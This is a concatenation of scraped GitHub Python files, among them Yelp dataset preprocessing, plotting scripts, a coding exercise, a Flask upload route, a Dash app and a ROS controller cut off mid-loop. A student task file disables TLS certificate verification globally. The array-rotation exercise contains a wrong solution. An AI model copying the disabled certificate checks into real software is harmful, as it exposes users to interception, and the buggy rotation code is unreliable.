word_counter = \\\n tokenize_sentences(sentences, para_limit=args.para_limit)\n writeLines(context_list, args.data_dir+'/yelp.in')\n writeLines(labels, args.data_dir+'/yelp.out')\n\n print(\"\\nStep 2.2: Filter dataset against glove embedding...\")\n texts = readLinesList(args.data_dir+'/yelp.in')\n labels = readLinesList(args.data_dir+'/yelp.out')\n sentences = []\n for ind, text in enumerate(texts):\n sentence = {}\n sentence['text'] = text\n sentence['label'] = labels[ind]\n sentences.append(sentence)\n print('\\nbefore filtering: '+str(len(sentences)))\n\n filtered_sentences, embed_dict = filter_against_embedding(sentences, word_counter, emb_file=args.embed_file)\n print('\\nafter filtering: '+str(len(filtered_sentences)))\n\n texts = [sentence['text'] for sentence in filtered_sentences]\n labels = [sentence['label'] for sentence in filtered_sentences]\n writeLines(texts, args.data_dir + '/yelp_filtered.in')\n writeLines(labels,args.data_dir + '/yelp_filtered.out')\n\n\n print(\"\\nStep 2.3: Split into train, dev and test datasets...\")\n dev_test_percentage = 0.05\n sentences = []\n texts = readLinesList(args.data_dir+'/yelp_filtered.in')\n labels = readLinesList(args.data_dir+'/yelp_filtered.out')\n for ind, text in enumerate(texts):\n sentence={}\n sentence['text'] = text\n sentence['label'] = labels[ind]\n sentences.append(sentence)\n sentences = np.array(sentences)\n\n total = len(sentences)\n dev_test_num = int(total * dev_test_percentage)\n dev = sentences[:dev_test_num]\n test = sentences[dev_test_num: dev_test_num*2]\n train = sentences[dev_test_num*2: ]\n\n writeLines([sent['text'] for sent in train], args.data_dir + '/yelp_train.in')\n writeLines([sent['text'] for sent in dev], args.data_dir + '/yelp_dev.in')\n writeLines([sent['text'] for sent in test], args.data_dir + '/yelp_test.in')\n writeLines([sent['label'] for sent in train], args.data_dir + '/yelp_train.out')\n writeLines([sent['label'] for sent in dev], args.data_dir + '/yelp_dev.out')\n writeLines([sent['label'] for sent in test], args.data_dir + '/yelp_test.out')\n\n print(\"Step 2.4: Extract embeddings for filtered sentence vocabs...\")\n\n sentences_tokens = [sent['text'].split() for sent in sentences]\n word_counter = dict()\n for sentence in sentences_tokens:\n for token in sentence:\n if token in word_counter:\n word_counter[token] = word_counter[token] + 1\n else:\n word_counter[token] = 1\n\n word_counter_new = sorted(word_counter.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n\n vocab_output_file = codecs.open(args.data_dir + '/vocab_count.txt', \"w\", \"utf-8\")\n for word in word_counter_new:\n vocab_output_file.write(word[0]+' '+str(word[1])+'\\n')\n\n word_emb_mat, word2idx_dict = embed_sentences(word_counter, word_emb_file=args.embed_file)\n writeLines(word2idx_dict.keys(), args.data_dir + '/vocab.in')\n save(args.data_dir + '/emb.json', word_emb_mat, message=\"word embedding\")\n\ndef binarise_and_balance():\n partitions = ['train', 'dev', 'test']\n\n for partition in partitions:\n sentences = readLinesList(args.data_dir+'/yelp_'+partition+'.in')\n pos_sents, neg_sents = [], []\n for ind, line in enumerate(open(args.data_dir+'/yelp_'+partition+'.out', 'r')):\n if line.strip() == '1.0' or line.strip() == '2.0':\n neg_sents.append(sentences[ind])\n elif line.strip() == '4.0' or line.strip() == '5.0':\n pos_sents.append(sentences[ind])\n\n np.random.seed(0)\n shuffled_ids = np.arange(len(pos_sents))\n np.random.shuffle(shuffled_ids)\n pos_sents = np.array(pos_sents)[shuffled_ids]\n\n sents = neg_sents + pos_sents.tolist()[:len(neg_sents)]\n labels = ['1.0 0.0'] * len(neg_sents) + ['0.0 1.0'] * len(neg_sents)\n\n shuffled_ids = np.arange(len(sents))\n np.random.shuffle(shuffled_ids)\n sents = np.array(sents)[shuffled_ids]\n labels = np.array(labels)[shuffled_ids]\n\n with open(args.data_dir+'/'+partition+'.in', 'w') as output_file:\n for line in sents:\n output_file.write(line+'\\n')\n with open(args.data_dir+'/'+partition+'.out', 'w') as output_file:\n for line in labels:\n output_file.write(line+'\\n')\n\n\n###################### CF embedding ###################\n\nimport codecs\nimport os\n\ndef parse_cf_emb(cf_file_path):\n\n vocab = []\n matrix = []\n for line in tqdm(open(cf_file_path, 'r'), total=CF_WORD_SIZE):\n comps = line.strip().split()\n word = ''.join(comps[0:-300])\n vec = comps[-300:]\n vocab.append(word)\n matrix.append(vec)\n writeLines(vocab, 'embeddings/counter-fitted-vectors-vocab.txt')\n json.dump(matrix, open('embeddings/counter-fitted-vectors-emb.json', 'w'))\n\ndef transform_cf_emb():\n\n if not os.path.exists('embeddings/counter-fitted-vectors-vocab.txt') or \\\n not os.path.exists('embeddings/counter-fitted-vectors-emb.json'):\n parse_cf_emb('embeddings/counter-fitted-vectors.txt')\n\n\n vocab = readLinesList(args.data_dir + '/vocab.txt')\n cf_vocab = readLinesList('embeddings/counter-fitted-vectors-vocab.txt')\n\n print('glove_vocab_size: '+str(len(vocab)))\n print('cf_vocab_size: ' + str(len(cf_vocab)))\n\n with codecs.open(args.data_dir + '/emb.json', \"r\", \"utf-8\") as fh:\n emb = json.load(fh)\n\n with codecs.open('embeddings/counter-fitted-vectors-emb.json', \"r\", \"utf-8\") as fh:\n cf_emb = json.load(fh)\n\n vocab_diff = []\n vocab_diff_ind = []\n for ind, word in enumerate(vocab):\n if word not in cf_vocab:\n vocab_diff.append(word)\n vocab_diff_ind.append(ind)\n\n print('extend_vocab_size: ' + str(len(vocab_diff_ind)))\n\n\n new_cf_vocab = cf_vocab + vocab_diff\n new_emb = cf_emb\n for ind, word in enumerate(vocab_diff):\n new_emb.append(emb[vocab_diff_ind[ind]])\n\n print('combined_cf_vocab_size: ' + str(len(new_emb)))\n\n writeLines(new_cf_vocab, args.data_dir + '/cf_vocab.in')\n json.dump(new_emb, open(args.data_dir + '/cf_emb.json', 'w'))\n\ndef split_pos_neg():\n\n input_sents = readLinesList(args.data_dir+'/train.in')\n labels = readLinesList(args.data_dir+'/train.out')\n\n pos_out_file = open(args.data_dir+'/train.pos.in', 'w')\n neg_out_file = open(args.data_dir+'/train.neg.in', 'w')\n pos_lab_file = open(args.data_dir+'/train.pos.out', 'w')\n neg_lab_file = open(args.data_dir+'/train.neg.out', 'w')\n\n for ind, sent in enumerate(input_sents):\n label = labels[ind]\n if label == '1.0 0.0':\n neg_out_file.write(sent+'\\n')\n neg_lab_file.write(label+'\\n')\n elif label == '0.0 1.0':\n pos_out_file.write(sent + '\\n')\n pos_lab_file.write(label + '\\n')\n\n\nif __name__ == '__main__':\n print(\"Step 1: Parse json file...\")\n parse_json()\n print(\"\\nStep 2: Data partition/GloVe embedding extraction...\")\n process()\n print(\"\\nStep 3: Binarise and downsampling...\")\n binarise_and_balance()\n print(\"\\nStep 4: Counter-fitted embedding extraction...\")\n transform_cf_emb()\n print(\"\\nStep 5: Split train set into pos/neg examples (for conditional generation only)...\")\n split_pos_neg()\n\n\n", "repo_name": "ibm-aur-nlp/adv-def-text-dist", "sub_path": "yelp_preprocessing.py", "file_name": "yelp_preprocessing.py", "file_ext": "py", "file_size_in_byte": 13256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.blank", "line_number": 14, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 46, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 68, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 90, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 270, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 292, "usage_type": "call"}, {"api_name": "json.load", "line_number": 293, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 295, "usage_type": "call"}, {"api_name": "json.load", "line_number": 296, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 316, "usage_type": "call"}]} +{"seq_id": "18117915340", "text": "import plotly.graph_objects as go\nimport numpy as np\n\n\nfilename = 'dump/2020-12-14T01:28:14-14.csv'\nvalues = np.genfromtxt(filename, delimiter=',')\n\nfig = go.Figure(data=go.Volume(\n x=values[:, 0],\n y=values[:, 1],\n z=values[:, 2],\n value=values[:, 3],\n isomin=0,\n isomax=.01,\n opacity=.3, # needs to be small to see through all surfaces\n surface_count=10, # pick larger for good volume rendering\n )\n)\nfig.show()\n", "repo_name": "kostmetallist/hyperbolic-equation-solver", "sub_path": "dump/visualization/heat_map.py", "file_name": "heat_map.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Volume", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "3576151762", "text": "from typing import List\n\n\ndef solution(A: List, K: int):\n\n items_length = len(A)\n\n # placeholder new items\n new_items = [0] * items_length\n for i in range(items_length):\n r = rotate(K, i, items_length)\n new_items[r] = A[i]\n\n return new_items\n\n\ndef rotate(times, index, length):\n \"\"\"rotate index number of times\"\"\"\n\n return (index + times) % length\n\n\ndef solution2(A: List, K: int):\n \"\"\"\n rotate A, K times\n\n if value of K is within the length of the Array (K <= length(A)) then, \n the item at the Kth will be the first item at the end of the rotation.\n\n The issue with this approach is that of when K > length(A) then we could\n use K mod length(A) to find the new K\n \"\"\"\n\n # find the start index \n start_index = K - 1\n\n head = A[start_index:]\n tail = A[:start_index]\n\n return head + tail\n\n\nif __name__ == \"__main__\":\n # print(solution([3, 8, 9, 7, 6], 3))\n print(solution2([3, 8, 9, 7, 6], 3))\n\n# print(solution([0, 0, 0], 1))\n# print(solution([1, 2, 3, 4], 4))\n", "repo_name": "phacic/dsa-py", "sub_path": "codility/lessons/2-arrays/cyclic_rotate.py", "file_name": "cyclic_rotate.py", "file_ext": "py", "file_size_in_byte": 1047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "14439205661", "text": "import os\nfrom requests import get\nimport json\nimport csv\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nclass Task(object):\n def __init__(self):\n print('Downloading JSON file and printing entire file:') \n self.response = get('http://db.cs.pitt.edu/courses/cs1656/data/hours.json', verify=False) \n print(self.response.content) \n\n print('Loading as JSON and iterating one line at a time:') \n self.hours = json.loads(self.response.content) \n print(self.hours) \n\n print('\\nIterating over JSON:') \n for line in self.hours: \n print(line) \n\n def part4(self):\n #write output to hours.csv\n with open('hours.json', 'r+') as j_file:\n j_data = json.load(j_file)\n\n csv_file = open('hours.csv', 'w')\n writer = csv.writer(csv_file)\n\n key_printed = False\n\n for keys in j_data:\n if key_printed is False:\n writer.writerow(keys)\n key_printed = True \n writer.writerow(keys.values())\n \n csv_file.close()\n pass\n \n\n def part5(self):\n\n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n print(reader)\n \n #write output to 'part5.txt'\n f = open('part5.txt', 'w') \n f.writelines(str(reader))\n c_file.close()\n f.close()\n\n def part6(self):\n #write output to 'part6.txt'\n f = open('part6.txt', 'w') \n\n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n for row in reader:\n print(row)\n f.writelines(str(row)+\"\\n\")\n\n c_file.close()\n f.close()\n \n\n def part7(self):\n #write output to 'part7.txt'\n f = open('part7.txt', 'w') \n \n c_file = open('hours.csv', 'r')\n reader = csv.reader(c_file)\n for row in reader:\n for cell in row:\n print(cell)\n f.writelines(str(cell)+\"\\n\")\n\n c_file.close()\n f.close()\n\n\nif __name__ == '__main__':\n task = Task()\n task.part4()\n task.part5()\n task.part6()\n task.part7()", "repo_name": "ap1605/CS1656_rec1", "sub_path": "rec_1/task.py", "file_name": "task.py", "file_ext": "py", "file_size_in_byte": 2192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ssl._create_default_https_context", "line_number": 6, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 28, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 59, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "40162064528", "text": "from flask import Blueprint, render_template, current_app\nfrom addiction.models.file import File\nimport os\nfrom addiction.views.publications.forms import UploadForm\nfrom werkzeug.utils import secure_filename\n\n\npublication_blueprint=Blueprint('publication', __name__, template_folder=\"templates\")\nname_dict={\"academic\":\"აკადემიური პუბლიკაციები\", \"annual\":\"წლიური ანგარიშები\", \"books\": \"წიგნები\", \"prevention\":\"პრევენციის სახელმძღვანელოები\", \"psychoed\":\"ფსიქოგანათლება\", \"research\":\"კვლევითი ანგარიშები\", \"treatment\":\"მკურნალობის გზამკვლევები\"}\n\n\n@publication_blueprint.route(\"/publications/\", methods=['GET', 'POST'])\ndef publication(folder):\n publications=File.query.filter_by(folder=folder).all()\n form=UploadForm()\n if form.validate_on_submit():\n if form.pdf.data:\n filename=secure_filename(form.pdf.data.filename)\n displayname=form.displayname.data\n path=os.path.join(current_app.config['BASE_DIR'], 'static', 'publications', folder, filename)\n form.pdf.data.save(path)\n new_file=File(filename=filename, displayname=displayname, file_path=path, folder=folder)\n new_file.create()\n return render_template(\"publications/publications.html\", publications=publications, name_dict=name_dict, folder=folder, form=form)\n\n\n\n\n@publication_blueprint.route('/view/')\ndef view(pdf_name):\n publication=File.query.filter_by(filename=pdf_name).first()\n return render_template(\"publications/closeview.html\", publication=publication, name_dict=name_dict)\n\n", "repo_name": "lasha-chipashvili/AddictionStudies", "sub_path": "addiction/views/publications/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query.filter_by", "line_number": 14, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query", "line_number": 14, "usage_type": "attribute"}, {"api_name": "addiction.models.file.File", "line_number": 14, "usage_type": "name"}, {"api_name": "addiction.views.publications.forms.UploadForm", "line_number": 15, "usage_type": "call"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.current_app.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 20, "usage_type": "name"}, {"api_name": "addiction.models.file.File", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query.filter_by", "line_number": 31, "usage_type": "call"}, {"api_name": "addiction.models.file.File.query", "line_number": 31, "usage_type": "attribute"}, {"api_name": "addiction.models.file.File", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "19314201286", "text": "import haiku as hk\nfrom chex import Array\nfrom jax import numpy as jnp\n\nfrom surjectors.surjectors.funnel import Funnel\n\n\nclass Augment(Funnel):\n \"\"\"\n Augment funnel\n \"\"\"\n\n def __init__(self, n_keep, encoder):\n super().__init__(n_keep, None, None, encoder, \"generative_surjector\")\n\n def split_input(self, array):\n \"\"\"Split an array\"\"\"\n spl = jnp.split(array, [self.n_keep], axis=-1)\n return spl\n\n def inverse_and_likelihood_contribution(self, y, x: Array = None, **kwargs):\n z_plus = y_condition = y\n if x is not None:\n y_condition = jnp.concatenate([y_condition, x], axis=-1)\n z_minus, lc = self.encoder(y_condition).sample_and_log_prob(\n seed=hk.next_rng_key()\n )\n z = jnp.concatenate([z_plus, z_minus], axis=-1)\n return z, -lc\n\n def forward_and_likelihood_contribution(self, z, x=None, **kwargs):\n z_plus, z_minus = self.split_input(z)\n y_condition = y = z_plus\n if x is not None:\n y_condition = jnp.concatenate([y_condition, x], axis=-1)\n lc = self.encoder(y_condition).log_prob(z_minus)\n return y, -lc\n\n def forward(self, z, x=None):\n y, _ = self.forward_and_likelihood_contribution(z, x)\n return y\n", "repo_name": "dirmeier/ssnl", "sub_path": "surjectors/surjectors/surjectors/augment.py", "file_name": "augment.py", "file_ext": "py", "file_size_in_byte": 1280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "surjectors.surjectors.funnel.Funnel", "line_number": 8, "usage_type": "name"}, {"api_name": "jax.numpy.split", "line_number": 18, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 18, "usage_type": "name"}, {"api_name": "chex.Array", "line_number": 21, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "haiku.next_rng_key", "line_number": 26, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 28, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 28, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 35, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "17445323702", "text": "import altair as alt \nimport pandas as pd\nimport numpy as np\nfrom dash import Dash, html, dcc, Input, Output\n\n\nmovies = pd.read_json(\"./data/movies.json\")\n\napp = Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])\nserver = app.server\napp.layout = html.Div([\n \"Movies Vote Average by Different Variables\",\n html.Iframe(\n id='scatter',\n style={'border-width': '0', 'width': '100%', 'height': '400px'}),\n dcc.Dropdown(\n id='xcol-widget',\n value='runtime', # REQUIRED to show the plot on the first page load\n options=[{'label': col, 'value': col} for col in movies.select_dtypes(include=np.number).columns]),\n dcc.Dropdown(\n id='colour-widget',\n value='studios', # REQUIRED to show the plot on the first page load\n options=[{'label': \"Studios\", 'value': \"studios\"}, {'label': \"Genres\", 'value': \"genres\"}])])\n\n# Set up callbacks/backend\n@app.callback(\n Output('scatter', 'srcDoc'),\n Input('xcol-widget', 'value'),\n Input('colour-widget', 'value'))\ndef plot_altair(xcol, colour):\n chart = alt.Chart(movies).mark_point().encode(\n x=xcol,\n y='vote_average',\n color=colour,\n tooltip='vote_average').interactive()\n return chart.to_html()\n\nif __name__ == '__main__': \n app.run_server(debug=False)", "repo_name": "AraiYuno/python-dash-demo", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_json", "line_number": 7, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 11, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 11, "usage_type": "name"}, {"api_name": "dash.html.Iframe", "line_number": 13, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 13, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 16, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.number", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dash.dcc.Dropdown", "line_number": 20, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 20, "usage_type": "name"}, {"api_name": "altair.Chart", "line_number": 31, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 27, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 28, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "71045616806", "text": "# You are given an integer array nums consisting of n elements, and an integer \n# k. \n# \n# Find a contiguous subarray whose length is greater than or equal to k that \n# has the maximum average value and return this value. Any answer with a \n# calculation error less than 10⁻⁵ will be accepted. \n# \n# \n# Example 1: \n# \n# \n# Input: nums = [1,12,-5,-6,50,3], k = 4\n# Output: 12.75000\n# Explanation:\n# - When the length is 4, averages are [0.5, 12.75, 10.5] and the maximum \n# average is 12.75\n# - When the length is 5, averages are [10.4, 10.8] and the maximum average is 1\n# 0.8\n# - When the length is 6, averages are [9.16667] and the maximum average is 9.16\n# 667\n# The maximum average is when we choose a subarray of length 4 (i.e., the sub \n# array [12, -5, -6, 50]) which has the max average 12.75, so we return 12.75\n# Note that we do not consider the subarrays of length < 4.\n# \n# \n# Example 2: \n# \n# \n# Input: nums = [5], k = 1\n# Output: 5.00000\n# \n# \n# \n# Constraints: \n# \n# \n# n == nums.length \n# 1 <= k <= n <= 10⁴ \n# -10⁴ <= nums[i] <= 10⁴ \n# \n# Related Topics Array Binary Search 👍 542 👎 61\nfrom itertools import accumulate\nfrom typing import List, Optional\nfrom dataStructure.ListNode import ListNode\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def findMaxAverage(self, nums: List[int], k: int) -> float:\n n=len(nums)\n def check(mid):\n pre=[0]+list(accumulate([v-mid for v in nums]))\n minv=0\n for i in range(k,n+1):\n # 这里不能pre[i]-pre[i-k]>=0\n # [-1,2,-3,-2,3]\n if pre[i]-minv>=0:return True\n # 必须保持距离大于等于k\n minv=min(minv,pre[i-k+1])\n return False\n\n l,r=min(nums),max(nums)\n # 二分\n while r-l>1e-5:\n mid=(l+r)/2\n if check(mid):\n l=mid\n else:\n r=mid\n return r\n \n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n a = Solution()", "repo_name": "ChaunceyBai98/LeetCodePython", "sub_path": "leetcode/editor/en/[644]Maximum Average Subarray II.py", "file_name": "[644]Maximum Average Subarray II.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "itertools.accumulate", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "35173472973", "text": "import twstock\nimport matplotlib.pyplot as plt\nimport pandas as pd\nst = twstock.Stock('2454')\n# 獲取 2018 年 01 月至今日之股票資料\nst1= st.fetch_from(2018,1) \nst2454 = pd.DataFrame(st1)\nst2454 = st2454.set_index('date')\nfig = plt.figure(figsize=(10, 6))\nplt.plot(st2454.close, '-' , label=\"close\")\nplt.plot(st2454.open, '-' , label=\"open\")\nplt.title('MediaTech 2018 open/close',loc='right')\n# loc->title的位置\nplt.xlabel('date')\nplt.ylabel('close')\nplt.grid(True, axis='y')\nplt.legend()\nfig.savefig('day20_01.png')\n", "repo_name": "HwangProbot/stockResearch", "sub_path": "getDataPlotOpenClose.py", "file_name": "getDataPlotOpenClose.py", "file_ext": "py", "file_size_in_byte": 533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twstock.Stock", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "9197382975", "text": "import os\nfrom pathlib import Path\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Config:\n SECRET_KEY = 'super duper secret key'\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'database.db')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n\n FLATS = [\"Memmert\", \"Borkum\", \"Kajo\"]\n DOC_PATH = Path(basedir) / \"documents\"\n BOOKING_STATES = [\"angefragt\", \"reserviert\"]\n PAYMENT_STATES = [\"offen\", \"Anzahlung\", \"bezahlt\"]\n TOURIST_TAX_STATES = [\"offen\", \"bezahlt\"]", "repo_name": "johannes-scheibe/rental-manager", "sub_path": "rental_manager/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "9466587415", "text": "#!/usr/bin/env python\n#The line above tells Linux that this file is a Python script,\n#and that the OS should use the Python interpreter in /usr/bin/env\n#to run it. Don't forget to use \"chmod +x [filename]\" to make\n#this script executable.\n\n#Import the rospy package. For an import to work, it must be specified\n#in both the package manifest AND the Python file in which it is used.\nimport rospy\nimport tf\nimport sys\nimport numpy as np\nfrom geometry_msgs.msg import Twist, PoseArray, Pose, Quaternion, Point, Vector3\nfrom rrt.msg import PointArray\nfrom tf.transformations import quaternion_matrix, euler_from_quaternion\n\n#Define the method which contains the main functionality of the node.\ndef controller(message):\n \"\"\"\n Controls a robot whose position is denoted by robot_frame,\n to go to a position denoted by target_frame\n Inputs:\n - robot_frame: the tf frame of the robot base.\n - target_frame: the tf frame of the desired position.\n \"\"\"\n\n ################################### YOUR CODE HERE #############\n #Create a publisher and a tf buffer, which is primed with a tf listener\n #TODO: replace 'INPUT TOPIC' with the correct name for the ROS topic on which\n # the robot accepts velocity inputs.\n pub = rospy.Publisher('teleop_velocity_smoother/raw_cmd_vel', Twist, queue_size=10)\n #tfBuffer = tf.Buffer()\n tfListener = tf.TransformListener()\n\n \n # Create a timer object that will sleep long enough to result in\n # a 10Hz publishing rate\n freq = 2\n r = rospy.Rate(freq) # freq hz\n freq2 = 10\n r2 = rospy.Rate(freq2)\n\n K1 = 1\n K2 = 1\n\n pos_epsilon_error = 0.5 #set error value\n orientation_epsilon_error = 0.01\n x_diff_error = 0.05\n y_diff_error = 0.05\n\n zero_cmd = Twist()\n zero_cmd.linear = Vector3()\n zero_cmd.angular = Vector3()\n zero_cmd.linear.x = 0\n zero_cmd.linear.y = 0\n zero_cmd.linear.z = 0\n zero_cmd.angular.x = 0\n zero_cmd.angular.y = 0\n zero_cmd.angular.z = 0\n\n robot_frame = '/base_link' #TODO this needs to be a TF frame. I can't figure out how to create a TF frame and attach it to the gazebo turtlebot\n fixed_frame = '/map' #TODO this is currently the marker.header.frame_id from assignment.py. \n\n # poses = [Pose(Point(-3, 1.5, 0), Quaternion(x=0, y=0, z=1, w=np.pi))] #message.poses\n target_points = message.points # [Point(-3, 1.5, 0)]\n for i in range(len(target_points)):\n target_point = target_points[i]\n reachedOrientation = False\n reachedPosition = False\n\n # Loop until the node is killed with Ctrl-C \n blah = 0\n while not reachedPosition:\n while not reachedOrientation:\n 